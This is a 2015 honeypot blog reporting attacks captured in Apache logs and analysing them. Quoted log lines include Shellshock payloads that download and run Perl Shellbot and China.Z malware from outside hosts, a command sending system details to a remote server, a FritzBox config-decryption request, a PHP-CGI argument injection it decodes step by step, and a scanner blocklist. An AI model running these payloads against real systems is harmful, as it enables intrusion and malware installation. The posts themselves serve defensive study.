Mittwoch, 27. Mai 2015

Thats new: allcfgconf attack seen in the wild

According to my last log files from yesterday, there was an attack which included a allcfgconf statement

 beeswarm [mypyfwa] 2015-05-28 06:45:30.048870 get /cgi-bin/webcm                   ?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -c voip -c -o - ../../         ../../../var/tmp/voip.cfg %26 http/1.1 162.248.50.159 US Path
The original logfile shows

 162.248.50.159 - - [27/May/2015:09:29:39 +0200] "GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg %26 HTTP/1.1" 404 493 "-" "-"
As I was unaware of the statement, I did a short research and the allcfgconf seems to be related to FritzBox see the manual here
So this attack targeted
  • -C voip : use the voip config type
  • -c : decrypt the password
  • -o : print the config

Dienstag, 26. Mai 2015

Introducing IBM X-Force Exchange

Several weeks ago IBM launched there X-Force Exchange Webinterface.
Basically, the idea behind this is to have a collaboration platform where all people working within the security area or are interested can check for urls, malware or IP information and share their knowledge
https://exchange.xforce.ibmcloud.com/

There is a API available. You will find the link in the left lower corner after you have created an account and are logged in.

https://github.com/johestephan/sendmespamids.py

Is the script and toolbox for this IDS. To respond to the new platform and to use the huge database IBM has created over the time, I added ibmxforce and the the XFupload.py script to my toolbox.

The script in the current state does
  • -u <url> - query the given url to the api and display the information, this is for normal urls like http://sendmespamids.blogspot.nl
  • -m <url> - query the given url and display the information, this is for normal urls like http://sendmespamids.blogspot.nl/agivenfile
  •  -f  <file> - will create a md5 hash from a given file and query this hash against the api and display the result
Currently only the raw json output will be displayed. I am working on a deeper integration of the script into the toolbox, so stay tuned for updates.
 
You will need an authentication token to use the api. This one will be fetched and stored on the first run, so please ensure that the folder is writeable.


IBM and XFORCE are trademarks, brands which belongs to IBM (www.ibm.com)

Montag, 18. Mai 2015

Mid May Report

Mid-May Honeypot report.
Today I will realease some statistics of my Honeypot. The data is fetched using my apache analyzer script in newest version. Source data are all access log starting with 18 April until today.

~/SendMeSpamIDS.py/mypyfwa$ python mypyfwa.py -s /home/jstephan/MidMay.log -l -i 0 -f MidMay
extended Blacklist: Wget|Python|sqlmap|curl|apach0day|pma|php|connect|wordpress|wp|zmeu|masscan|morfeus
extended Whitelist: 127.0.0.1|::1
Logged 25 Lines of bad headers
Logged 351 Lines of possible injections
Logged 16 Lines of strange headers
 If you want to do some research on your own: Here is the source document (GoogleDrive)

 Overall statistics






CountryCode overview



Scanner


The favorite tool to scan a Apache servers still seems to be masscan
masscan/1.0 (https://github.com/robertdavidgraham/masscan)



Shellinjection


This are still my favorite, as you get so much out of it, you see a nice URL and you get some malware you can analyze, pure fun :-)




 Some examples:

Perl based:
194.176.119.86 - - [02/May/2015:21:14:22 +0200] "GET / HTTP/1.1" 404 412 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://psychoid.us/non -O /tmp/b.pl;curl -O /tmp/b.pl http://psychoid.us/non;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
 

other:
46.151.212.26 - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`"
 ChinaZ:
121.207.230.74 - - [20/Apr/2015:22:59:37 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/java -O /tmp/China.Z-taar >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-taar >> /tmp/Run.sh;echo /tmp/China.Z-taar >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/java -O /tmp/China.Z-taar >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-taar >> /tmp/Run.sh;echo /tmp/China.Z-taar >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
 

Length of request

I have one check which check the request length. I used a hardcoded size to detect this. Normally nothing good comes from a log request.
  • PHP encoded - means hereby that the url was encoded, please see an older blogpost which explains this sort of attack here
  • Wordpress direct - means that this was a direct request against a admin page or such
  • connect - means the connect statements I described in an older blogpost here










Montag, 11. Mai 2015

"Case study. Please bear with us. Thank you." Injection

Tonight several attempts has hit my system

 46.151.212.26 - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`"

When executing the wget request (without the info) the final file just tells

Case study. Please bear with us. Thank you.
 The Idea behind the several statements is quite simple,
if the injection would work it would report to the page

  • uname - might be Linux
  • whoami - the user which owns/runs the shell
  • and the output of ifconfig.me - what is the IP of the server

 

Mittwoch, 6. Mai 2015

PHP injection attacks (encoded url analyze)

I adjusted my analysing script to now do a length count of the request. Reason was a ongoing attack which tried to inject url encoded code into the system.

Such codes look like

101.251.236.91 - - [06/May/2015:09:07:16 +0200] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"
Honestly, this code is quite new to me, so I need to google a lot on how to work with this things.
As most blog posts just say, "this is the attack, so it looks decoded" or others just points to a decoder software on the net, I thought it might be a help when I just tell you here in one post what this is and how to have a deeper look into it :-)

As you can see, the basic code is hidden here

 %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E

What looks so fancy, is just a encoded url. No hex, no base64.

My favourite tool to work, and maybe you know from my scripts, is python. So lets just start ipython and finish this

 import urllib

url = "/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E"

print urllib.unquote(url).decode('utf-8')
 /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env="yes"+-d+cgi.fix_pathinfo=1+-d+auto_prepend_file=php://input+-n
So, easy? Yes it is, Now you know what it is and how to decode it :-)

China.Z still out there

I am still seeing China.Z malware or variants hitting the system on a regular base (1 to 4 each night). All attack vectors look the same , only the naming changes time by time.

  • /tmp/China.Z-vfxr
  • /tmp/China.Z-boxo
  • /tmp/China.Z-rnxl
  • etc.

All get detected by ClamAV
714.64.1: Linux.Trojan.IptabLex FOUND
 121.207.230.74 - - [07/May/2015:01:50:01 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/714.64 -O /tmp/China.Z-vgtd >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-vgtd >> /tmp/Run.sh;echo /tmp/China.Z-vgtd >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/714.64 -O /tmp/China.Z-vgtd >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-vgtd >> /tmp/Run.sh;echo /tmp/China.Z-vgtd >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
Please refer to Virustotal for details of the source IP

Sonntag, 3. Mai 2015

Trojan.Perl.Shellbot-2 injection

Last night I had another 30 lines of tried shell code injection and the download of malware.

194.176.119.86 - - [02/May/2015:21:14:23 +0200] "GET /cgi-bin/env.cgi HTTP/1.1" 404 471 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://psychoid.us/non -O /tmp/b.pl;curl -O /tmp/b.pl http://psychoid.us/non;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
The file which should be downloaded is a  Trojan.Perl.Shellbot-2 according to clamAV.